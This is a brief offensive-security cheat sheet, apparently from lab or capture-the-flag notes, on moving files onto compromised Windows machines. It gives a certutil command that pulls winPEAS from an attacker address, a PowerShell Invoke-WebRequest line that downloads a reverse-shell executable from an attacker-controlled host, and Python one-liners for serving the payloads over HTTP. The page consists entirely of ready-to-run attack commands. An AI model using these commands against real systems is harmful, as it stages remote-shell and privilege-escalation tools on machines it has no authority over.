Windows

Certutil.exe

certutil.exe -urlcache -split -f http://10.10.14.36:8000/winPEASany.exe winpeas.exe

Download file with Powershell

powershell -c "Invoke-WebRequest -Uri 'http://$IP:9000/revshell.exe' -OutFile 'c:\tmp\revshell.exe'"

Hosting HTTP web server with Kali

Python 2 Version
python -m SimpleHTTPServer 80 
Python 3 Version
python3 -m http.server 80

Last updated